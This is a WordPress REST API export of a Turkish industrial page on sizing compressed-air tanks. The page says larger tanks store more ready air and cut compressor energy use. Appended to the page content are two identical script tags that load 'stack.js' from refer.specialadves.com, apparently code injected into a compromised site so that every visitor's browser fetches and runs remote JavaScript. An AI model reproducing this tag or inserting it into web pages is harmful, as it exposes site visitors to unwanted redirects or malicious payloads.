{"id":840,"date":"2021-04-13T13:23:57","date_gmt":"2021-04-13T10:23:57","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hava-tanki-size-nasil-tasarruf-ettirir-copy-copy\/"},"modified":"2021-04-13T14:40:13","modified_gmt":"2021-04-13T11:40:13","slug":"hava-tanklarinin-boyutlandirilmasi-nasil-yapilir","status":"publish","type":"page","link":"http:\/\/gensalimited.com.tr\/index.php\/hava-tanklarinin-boyutlandirilmasi-nasil-yapilir\/","title":{"rendered":"Hava Tanklar\u0131&#8217;n\u0131n Boyutland\u0131r\u0131lmas\u0131 Nas\u0131l Yap\u0131l\u0131r?"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;809&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]Sat\u0131n alaca\u011f\u0131n\u0131z kompres\u00f6r\u00fcn \u00e7\u0131k\u0131\u015f bas\u0131nc\u0131 ve sizin ayn\u0131 anda ne kadar miktarda bas\u0131n\u00e7l\u0131 hava talep etti\u011finize g\u00f6re, tank\u0131n\u0131z\u0131n hacmi de\u011fi\u015febilir.<\/p>\n<p>Unutmay\u0131n alaca\u011f\u0131n\u0131z tank\u0131n kapasitesi ne kadar b\u00fcy\u00fck olursa, ilk dolum o kadar uzun s\u00fcrecektir. Tank\u0131n\u0131z\u0131n i\u00e7inde havan\u0131n dolu ve haz\u0131r olmas\u0131 i\u00e7in kompres\u00f6r\u00fcn\u00fcz\u00fc fabrika mesai saatleri ba\u015flamadan \u00f6nce \u00e7al\u0131\u015ft\u0131r\u0131rsan\u0131z, i\u015f ba\u015flad\u0131\u011f\u0131 anda haz\u0131r hale gelecektir.\u00a0 Bu y\u00fczden i\u015flerinizde beklenmedik gecikmeler ya\u015fanmamas\u0131 i\u00e7in bu hesab\u0131 da g\u00f6z \u00f6n\u00fcnde bulurdurmal\u0131s\u0131n\u0131z.<\/p>\n<p>Hava tanklar\u0131n\u0131n boyutu ne kadar b\u00fcy\u00fck olursa i\u00e7lerinde i\u015fleminiz i\u00e7in haz\u0131r daha fazla bas\u0131n\u00e7l\u0131 hava olacakt\u0131r. Bu da gerekmedi\u011fi takdirde, kompres\u00f6r\u00fcn\u00fcz\u00fcn \u00e7al\u0131\u015fmamas\u0131n\u0131 ve enerjji tasarrufu etmenizi sa\u011flar. Yani hava tank\u0131n\u0131z\u0131n hacmini b\u00fcy\u00fck se\u00e7mek elektrik ihtiyac\u0131n\u0131z\u0131 d\u00fc\u015f\u00fcrecektir.[\/vc_column_text][\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;809&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]Sat\u0131n alaca\u011f\u0131n\u0131z kompres\u00f6r\u00fcn \u00e7\u0131k\u0131\u015f bas\u0131nc\u0131 ve sizin ayn\u0131 anda ne kadar miktarda bas\u0131n\u00e7l\u0131 hava talep etti\u011finize g\u00f6re, tank\u0131n\u0131z\u0131n hacmi de\u011fi\u015febilir&#8230;.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-840","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/840","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=840"}],"version-history":[{"count":3,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/840\/revisions"}],"predecessor-version":[{"id":889,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/840\/revisions\/889"}],"wp:attachment":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=840"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}